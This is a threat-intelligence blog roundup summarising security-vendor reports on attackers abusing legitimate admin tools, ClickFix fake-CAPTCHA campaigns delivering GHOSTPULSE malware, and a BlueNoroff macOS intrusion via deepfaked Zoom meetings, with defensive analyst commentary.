CTI Roundup: Rogue Tools, ClickFix, and BlueNoroff

In this week’s roundup, the Tanium CTI team explores how threat actors are increasingly abusing legitimate tools for malicious purposes. We then examine the recent surge in ClickFix campaigns involving GHOSTPULSE malware, followed by a look at a sophisticated intrusion attributed to the BlueNoroff group.

Cyber attackers exploit legitimate tools

A recent post from Cisco Talos explores how cyber attackers are increasingly exploiting legitimate tools for malicious purposes. This growing trend highlights the need for organizations to monitor tool usage patterns and adopt behavior-based detection strategies.

Cisco Talos starts by walking through an example in which an individual was alerted to a detection from their security information and event management (SIEM) solution. This detection was configured to trigger when specific system tools were executed in rapid succession. It was activated overnight, raising additional suspicion. The team was able to isolate systems and track the activity.

What are LOLBins?

According to Cisco Talos, threat actors are frequently leveraging living off the land binaries (LOLBins), which are pre-installed tools that can be exploited to execute malicious actions without needing to download or install additional software. Since these tools are already installed in operating systems and commonly used for legitimate activities, it is difficult to detect malicious abuse.

Outside of LOLBins, actors are also abusing commercial and open-source tools. One example is DonPAPI, an open-source tool used to automate remote credential dumping. It has been observed in multiple engagements.

[Read also: 15 cybersecurity terms you (and your CEO) ought to know by now]

Types of commonly abused tools

The Cisco Talos report outlines the most commonly abused tools today, including:

• PsExec is a part of Microsoft’s Sysinternals tool suite and enables users to execute commands on both local and remote systems. Ransomware groups frequently use PsExec to execute payloads across multiple systems within a domain.
• Impacket is an open-source Python library for network audits. Threat actors often use Impacket to penetrate environments and move laterally across environments.
• Mimikatz is a credential-dumping utility for extracting plain text passwords. It’s commonly used by penetration testers and red teams. However, cybercriminals often use Mimikatz to lift account logins and other credentials to enable lateral movement.

When remote access management tools become threat vectors

Cisco Talos also discovered an increase in the abuse of remote monitoring and management (RMM) tools.

These tools are typically used by IT teams or MSPs to enable remote access to systems for support, though it is easy to assume why threat actors would be interested in easy remote access. Attackers are now using these tools to maintain persistence and avoid detection.

Analyst comments from Tanium’s Cyber Threat Intelligence team

It’s becoming more challenging to distinguish between legitimate administrative activity and malicious behavior. This blurring of the lines makes traditional signature-based detection less effective, and behavior-based and anomaly detections more critical.

Staying informed on the latest abuse involving open-source and commercial tools is key for defending against this threat.

[Read also: What is endpoint security? Learn about different types of endpoint protection solutions and the evolution of signature-based detection methods]

ClickFix campaigns continue to accelerate

Elastic Security Labs is reporting a rise in ClickFix campaigns, particularly those leveraging the GHOSTPULSE malware loader to deliver remote access trojans (RATs) and infostealers. Although ClickFix has been active since early 2024, its activity has recently intensified.

Elastic detailed a campaign that showcased the full attack chain—highlighting the components involved, the techniques used, and the malware ultimately delivered.

What are ClickFix attacks?

ClickFix-style attacks rely on social engineering, tricking users into taking unsafe actions by mimicking legitimate processes to build trust and lower defenses.

For example, this type of attack can appear as a fake CAPTCHA prompt that asks the user to paste and execute code on their device.

How do ClickFix attacks work?

As Elastic highlights, ClickFix is often the entry point in a multi-stage attack chain. In one analyzed campaign, the attack flow progression looked like this:

• The attack begins with a phishing page mimicking a Cloudflare Captcha prompt
• Victims are tricked into pasting and executing PowerShell code
• This code downloads a ZIP file containing components for the GHOSTPULSE loader

• Decrypts a file that was sent with the malware for Stage 1
• Extracts Stage 2 code, which checks for specific running processes

• Targets browser-stored password, cookies, and automation data
• Performs system profiling and reconnaissance
• Executes commands

Elastic determined that the original Captcha page was hosted under two domains, both of which they linked to a digital advertising agency. They believe the attacker must have compromised the server hosting the domains to facilitate their activity.

Related CTI reports on ClickFix

For more on how ClickFix has evolved across recent campaigns, check out these past CTI roundups:

• Published April 30, 2025: Explores how nation-state actors from North Korea, Iran, and Russia have recently adopted the ClickFix technique to deliver malware through social engineering
• Published March 12, 2025: Highlights a ClickFix-style phishing campaign that uses SharePoint and Microsoft Graph API to stealthily deploy a modified Havoc Demon agent
• Published June 26, 2024: Includes insights into ClickFix being used in widespread phishing campaigns to deliver malware like Vidar Stealer, with TA571 sending over 100,000 emails using fake document lures

Analyst comments from Tanium’s Cyber Threat Intelligence team

This surge in ClickFix attacks reveals how social engineering and malware delivery tactics are evolving. This technique relies on the trust and curiosity of the victim, which not only makes it difficult to detect, but also more likely to trick victims than methods they are already educated and trained on.

It’s worth noting that ClickFix isn’t just being used by low-level cybercriminals, but also by more sophisticated state-sponsored groups. Security teams are encouraged to focus on user education and use behavioral detection to identify suspicious activity.

BlueNoroff targets macOS devices

Researchers at Huntress recently analyzed a sophisticated intrusion campaign targeting macOS users in the Web3 space. Huntress is attributing the campaign to the BlueNoroff group.

The attack leveraged social engineering and a trojanized application to deploy malware capable of credential theft, surveillance, and persistence. It began when a threat actor tricked an employee into joining a spoofed Zoom meeting populated with deepfakes of the company’s senior leadership.

[Read also: Hiring remote IT workers? Beware the deepfake frauds]

Exploiting trust: Gaining access through a fake meeting invite

The initial contact came via Telegram, where the attacker—posing as an external contact—invited the employee to a live conversation. The message included a Calendly link that appeared to schedule a Google Meet session but instead redirected to a spoofed Zoom domain.

Weeks later, when the employee joined the meeting, they were met with several deepfakes of senior leaders within their own company in addition to the external contact. The deepfakes instructed the employee to download a Zoom extension because their microphone wasn’t working. The downloaded file was an AppleScript that opened the legitimate Zoom SDK webpage while silently downloading a payload from a malicious site.

According to Huntress, this script will disable bash history logging, ensure Rosetta 2 is installed, and attempt to get and verify the user’s password. At the end, it will remove shell history to make analysis more difficult.

Malware breakdown: Tools, tactics, and implants

Huntress identified several malicious binaries on the victim’s host. More details of each of these binaries can be found in the Huntress report.

• Persistent implant
  A binary named Telegram 2, written in Nim, acts as the persistence mechanism and initiates the backdoor. It’s lightweight and has limited functionality, capable of running echo commands, executing via /bin/bash, launching an interactive shell, and establishing persistence.
• Backdoor

  The Root Troy V4 (RTV) backdoor, written in Go, executes an AppleScript payload to download an additional implant. Huntress observed this command being executed six times between device onboarding and host isolation. RTV supports remote code execution, including during system sleep.

• Loader with two additional payloads

  A binary named “a” is downloaded via the AppleScript payload. It accepts another binary and a password as arguments, decrypts two embedded payloads, and can overwrite all files in the current directory with zeros.

  Notably, Huntress highlighted the two-part process injection capability—uncommon on macOS—as a standout feature:
  1. The first decrypted payload is a Nim-based implant used for command-and-control communication.2. The second is a minimal Swift-based application, likely used to support the implant’s functionality.

• Keylogger
  The attacker deployed XScreen, a tool for keylogging, screen recording, and clipboard data capture.
• Infostealer
  The airmond infostealer targets cryptocurrency wallets by scanning installed browser extensions and extracting associated data.
• Decoy binary
  The final binary, NetChk, is nearly empty. It continuously generates random numbers—likely as a decoy to distract analysts during investigation.

Analyst comments from Tanium’s Cyber Threat Intelligence team

BlueNoroff has evolved its tactics to exploit the Web3 ecosystem. The group’s ability to create and use complex macOS malware further demonstrates its sophistication and investment in cross-platform capabilities.

It’s evident that macOS is becoming a more popular target, especially for advanced threat actors. Aside from their sophisticated technical tactics, the group is also keeping up to date with current landscape trends with its use of deepfakes and advanced social engineering.

The report from Huntress is far more detailed for those looking for more technical analysis.

Do you have insight into these stories that you want to share? Head over to Tanium’s discussion forum to start a conversation.

For further reading, catch up on our recent cyber threat intelligence roundups.